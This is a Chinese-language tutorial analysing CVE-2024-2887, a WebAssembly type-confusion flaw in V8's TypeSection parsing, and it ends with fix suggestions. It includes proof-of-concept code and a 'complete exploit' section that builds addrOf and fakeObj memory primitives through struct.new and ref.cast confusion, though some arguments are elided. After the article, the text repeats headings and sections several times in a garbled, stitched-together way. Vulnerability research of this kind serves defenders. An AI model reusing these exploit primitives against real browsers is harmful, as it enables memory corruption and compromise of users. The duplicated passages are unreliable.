WASM类型混淆漏洞CVE-2024-2887深度分析与利用教学<\/h1>

漏洞概述<\/h2>
CVE-2024-2887是V8引擎中WebAssembly(WASM)的一个类型混淆漏洞，该漏洞源于V8对WASM模块类型定义(TypeSection)解析时的校验不完善，导致攻击者可以突破类型索引(typeidx)的数量限制，进而实现类型混淆攻击。<\/p>

背景知识<\/h2>

WASM内存模型<\/h3>

WASM虚拟机的内存模型分为三部分：<\/p>

虚拟寄存器<\/strong>：函数的局部变量，通过索引访问<\/li>
栈<\/strong>：WASM指令运行时使用的栈<\/li>

堆<\/strong>：WASM GC提案中支持在宿主环境堆上创建对象，由宿主环境GC管理<\/li> <\/ol>
WASM值类型分类<\/h3>

标量类型<\/strong>：<\/p>

numtype<\/code> = i32 | i64 | f32 | f64<\/li>
vectype<\/code> = v128<\/li> <\/ul> <\/li>
引用类型(reftype)<\/strong>：<\/p> 用于引用WASM Heap中的对象<\/li> 需要明确指向的对象类型<\/li> 对象类型指定方式： abstract heap type：预定义的大致对象类型<\/li> concrete heap type：使用typeidx表示自定义的具体对象类型<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 递归类型(Recursive Types)<\/h3> WASM GC提案支持递归类型，通过rec<\/code>块定义rectype<\/code>，内部可包含一个或多个subtype<\/code>，每个subtype<\/code>会被赋予唯一的typeidx<\/code>。<\/p> 示例：链表节点类型定义<\/p> builder<\/span>.startRecGroup<\/span>(); <\/span><\/span>let<\/span> nodeType1<\/span> =<\/span> builder<\/span>.addStruct<\/span>([ <\/span><\/span> makeField<\/span>(kWasmI32<\/span>, true<\/span>), \/\/ id字段 <\/span><\/span><\/span><\/span> makeField<\/span>(new<\/span> wasmRefNullType<\/span>(0<\/span>), true<\/span>) \/\/ 自身类型的引用，next指针 <\/span><\/span><\/span><\/span>], kNoSuperType<\/span>, false<\/span>, false<\/span>); <\/span><\/span>builder<\/span>.endRecGroup<\/span>(); <\/span><\/span><\/code><\/pre>漏洞成因<\/h2> TypeSection解析过程<\/h3> WASM模块类型表示<\/strong>：<\/p> WasmModule<\/code>中的types<\/code>数组记录所有定义的类型<\/li> 数组索引就是typeidx<\/code><\/li> 每个类型定义使用TypeDefinition<\/code>对象描述<\/li> <\/ul> <\/li> 解析逻辑问题<\/strong>：<\/p> 限制typeidx < kV8MaxWasmTypes<\/code>(默认为1,000,000)<\/li> 校验规则不完善：检查rectype<\/code>总量不超过kV8MaxWasmTypes<\/code><\/li> 处理包含多个subtype<\/code>的rec group<\/code>时检查：已有type数量 + rec group中type数量 <= kV8MaxWasmTypes<\/code><\/li> 但处理单个subtype<\/code>时没有<\/strong>进行数量检查<\/li> <\/ul> <\/li> <\/ul> <\/li> 突破限制的方法<\/strong>：<\/p> 第一个rectype<\/code>包含kV8MaxWasmTypes<\/code>个subtype<\/code><\/li> 第二个rectype<\/code>只含单个subtype<\/code><\/li> 导致module_->types<\/code>包含kV8MaxWasmTypes+1<\/code>个entry<\/li> <\/ul> <\/li> <\/ol> POC构造<\/h3> const<\/span> kV8MaxWasmTypes<\/span> =<\/span> 1_000_000<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 定义包含kV8MaxWasmTypes个subtype的rec group <\/span><\/span><\/span><\/span>builder<\/span>.startRecGroup<\/span>(); <\/span><\/span>for<\/span>(let<\/span> i<\/span>=<\/span>0<\/span>; i<\/span><<\/span>kV8MaxWasmTypes<\/span>; i<\/span>++<\/span>) { <\/span><\/span> builder<\/span>.addType<\/span>(makeSig<\/span>(...)); <\/span><\/span>} <\/span><\/span>builder<\/span>.endRecGroup<\/span>(); <\/span><\/span> <\/span><\/span>\/\/ 再次添加一个类型，typeidx=kV8MaxWasmTypes <\/span><\/span><\/span><\/span>let<\/span> strcutTypeIdx<\/span> =<\/span> builder<\/span>.addStruct<\/span>([...]); <\/span><\/span><\/code><\/pre>WASM类型系统深入<\/h2> 类型表示<\/h3> TypeDefinition结构<\/strong>：<\/p> struct<\/span> TypeDefinition<\/span> { <\/span><\/span> union<\/span> { <\/span><\/span> const<\/span> FunctionSig*<\/span> function_sig; <\/span><\/span> const<\/span> StructType*<\/span> struct_type; <\/span><\/span> const<\/span> ArrayType*<\/span> array_type; <\/span><\/span> }; <\/span><\/span> uint32_t<\/span> supertype; \/\/ 父类idx <\/span><\/span><\/span><\/span> Kind kind; \/\/ 类型大类(kFunction\/kStruct\/kArray) <\/span><\/span><\/span><\/span> bool<\/span> is_final; \/\/ 是否为final <\/span><\/span><\/span><\/span> bool<\/span> is_shared; <\/span><\/span> uint8_t<\/span> subtyping_depth; \/\/ 继承链深度 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> ValueType表示<\/strong>：<\/p> 使用32位整数紧凑表示所有可能的值类型<\/li> 包含三部分： ValueKind：区分值类型与引用类型<\/li> heap representation：引用类型指向的堆对象类型<\/li> CanonicalRelative bit：用于类型规范化过程<\/li> <\/ol> <\/li> <\/ul> <\/li> HeapType分类<\/strong>：<\/p> [0, kV8MaxWasmTypes)<\/code>：用户自定义的concrete heap type<\/li> [kV8MaxWasmTypes, kBottom]<\/code>：预定义的abstract heap type<\/li> <\/ul> <\/li> <\/ol> 漏洞利用原理<\/h2> 类型混淆机制<\/h3> 当typeidx<\/code>超过kV8MaxWasmTypes<\/code>时：<\/p> 可能被解读为用户自定义的concrete heap type<\/li> 也可能被解读为abstract heap type(如kAny\/kNone)<\/li> <\/ul> 不同指令对这种情况的处理不一致，导致类型混淆。<\/p> 关键指令分析<\/h3> struct.new指令<\/strong>：<\/p> 校验时只检查typeidx<\/code>是否小于types.size()<\/code><\/li> 不检查kV8MaxWasmTypes<\/code>限制<\/li> 编译时会将大typeidx<\/code>误认为kNone<\/code>类型<\/li> <\/ul> <\/li> ref.cast指令<\/strong>：<\/p> 用于带类型检查的安全类型转换<\/li> 当对象类型为none<\/code>时，转换为任意非函数类型总会成功<\/li> 因此会省略<\/strong>RuntimeType Check<\/li> <\/ul> <\/li> <\/ol> 利用思路<\/h3> 创建两个结构体类型：<\/p> typeidx0<\/code>：包含ref target_type<\/code>字段<\/li> typeidx1<\/code>(设置为HeapType::kNone<\/code>)：包含anyref<\/code>字段<\/li> <\/ul> <\/li> 利用流程：<\/p> 栈顶push要混淆的值<\/li> struct.new typeidx1<\/code>创建对象<\/li> ref.cast typeidx0<\/code>进行类型转换<\/li> struct.get<\/code>获取字段，实现类型混淆<\/li> <\/ol> <\/li> <\/ol> 原语构造<\/h3> addrOf原语<\/strong>：<\/p> 将ref extern<\/code>字段解释为i32<\/code>，泄露指针<\/li> <\/ul> <\/li> fakeObj原语<\/strong>：<\/p> 将i32<\/code>字段解释为ref extern<\/code>，伪造指针<\/li> <\/ul> <\/li> <\/ol> 完整EXP<\/h3> \/\/ 设置typeidx1为HeapType::None <\/span><\/span><\/span><\/span>for<\/span>(let<\/span> i<\/span>=<\/span>0<\/span>; i<\/span><<\/span>HeapType_None<\/span>; i<\/span>++<\/span>) { <\/span><\/span> builder<\/span>.addStruct<\/span>(...); <\/span><\/span>} <\/span><\/span>let<\/span> structTypeIdx1<\/span> =<\/span> builder<\/span>.addStruct<\/span>([ <\/span><\/span> makeField<\/span>(wasmRefNullType<\/span>(kWasmExternRef<\/span>), true<\/span>), \/\/ ref <\/span><\/span><\/span><\/span> makeField<\/span>(kWasmI32<\/span>, true<\/span>) \/\/ int <\/span><\/span><\/span><\/span>]); <\/span><\/span> <\/span><\/span>\/\/ addrOf函数 <\/span><\/span><\/span><\/span>builder<\/span>.addFunction<\/span>('addrOf'<\/span>, makeSig<\/span>([wasmRefType<\/span>(kWasmExternRef<\/span>)], [kWasmI32<\/span>])) <\/span><\/span> .addBody<\/span>([ <\/span><\/span> kExprLocalGet<\/span>, 0<\/span>, <\/span><\/span> ...wasmI32Const<\/span>(0<\/span>), <\/span><\/span> ...GCInstr<\/span>(kExprStructNew<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx1<\/span>), <\/span><\/span> ...GCInstr<\/span>(kExprRefCast<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx0<\/span>), <\/span><\/span> ...GCInstr<\/span>(kExprStructGet<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx0<\/span>), 0<\/span> <\/span><\/span> ]).exportFunc<\/span>(); <\/span><\/span> <\/span><\/span>\/\/ fakeObj函数 <\/span><\/span><\/span><\/span>builder<\/span>.addFunction<\/span>('fakeObj'<\/span>, makeSig<\/span>([kWasmI32<\/span>], [wasmRefNullType<\/span>(kWasmExternRef<\/span>)])) <\/span><\/span> .addBody<\/span>([ <\/span><\/span> kExprRefNull<\/span>, ...wasmSignedLeb<\/span>(kWasmExternRef<\/span>), <\/span><\/span> kExprLocalGet<\/span>, 0<\/span>, <\/span><\/span> ...GCInstr<\/span>(kExprStructNew<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx1<\/span>), <\/span><\/span> ...GCInstr<\/span>(kExprRefCast<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx0<\/span>), <\/span><\/span> ...GCInstr<\/span>(kExprStructGet<\/span>), ...wasmUnsignedLeb<\/span>(structTypeIdx0<\/span>), 1<\/span> <\/span><\/span> ]).exportFunc<\/span>(); <\/span><\/span><\/code><\/pre>总结与防御<\/h2> 漏洞本质<\/h3> 根本原因：向数组添加元素前未严格检查size<\/li> 利用关键：不同指令处理大typeidx<\/code>的歧义<\/li> 影响：实现稳定的类型混淆原语<\/li> <\/ul> 修复建议<\/h3> 严格校验所有typeidx<\/code>添加操作<\/li> 统一大typeidx<\/code>的处理逻辑<\/li> 加强类型系统边界检查<\/li> <\/ol> 参考价值<\/h3> 该漏洞利用展示了：<\/p> 如何将微小错误逐步放大<\/li> WASM类型混淆的经典模式<\/li> 稳定的原语构造方法<\/li> <\/ol> 参考文献<\/h2> CVE-2024-2887漏洞详情<\/li> WebAssembly GC规范<\/li> V8引擎源码分析<\/li> <\/ol>

WASM类型混淆漏洞CVE-2024-2887深度分析与利用教学<\/h1>

漏洞概述<\/h2> CVE-2024-2887是V8引擎中WebAssembly(WASM)的一个类型混淆漏洞，该漏洞源于V8对WASM模块类型定义(TypeSection)解析时的校验不完善，导致攻击者可以突破类型索引(typeidx)的数量限制，进而实现类型混淆攻击。<\/p>

背景知识<\/h2>

漏洞成因<\/h2>

WASM类型系统深入<\/h2>

漏洞利用原理<\/h2>

总结与防御<\/h2>

参考价值<\/h3> 该漏洞利用展示了：<\/p> 如何将微小错误逐步放大<\/li> WASM类型混淆的经典模式<\/li> 稳定的原语构造方法<\/li> <\/ol> 参考文献<\/h2> CVE-2024-2887漏洞详情<\/li> WebAssembly GC规范<\/li> V8引擎源码分析<\/li> <\/ol>

参考文献<\/h2> CVE-2024-2887漏洞详情<\/li> WebAssembly GC规范<\/li> V8引擎源码分析<\/li> <\/ol>

漏洞概述<\/h2>
CVE-2024-2887是V8引擎中WebAssembly(WASM)的一个类型混淆漏洞，该漏洞源于V8对WASM模块类型定义(TypeSection)解析时的校验不完善，导致攻击者可以突破类型索引(typeidx)的数量限制，进而实现类型混淆攻击。<\/p>

参考价值<\/h3>
该漏洞利用展示了：<\/p>

如何将微小错误逐步放大<\/li>
WASM类型混淆的经典模式<\/li>
稳定的原语构造方法<\/li> <\/ol>
参考文献<\/h2>

CVE-2024-2887漏洞详情<\/li>
WebAssembly GC规范<\/li>
V8引擎源码分析<\/li> <\/ol>

参考文献<\/h2>

CVE-2024-2887漏洞详情<\/li>
WebAssembly GC规范<\/li>
V8引擎源码分析<\/li> <\/ol>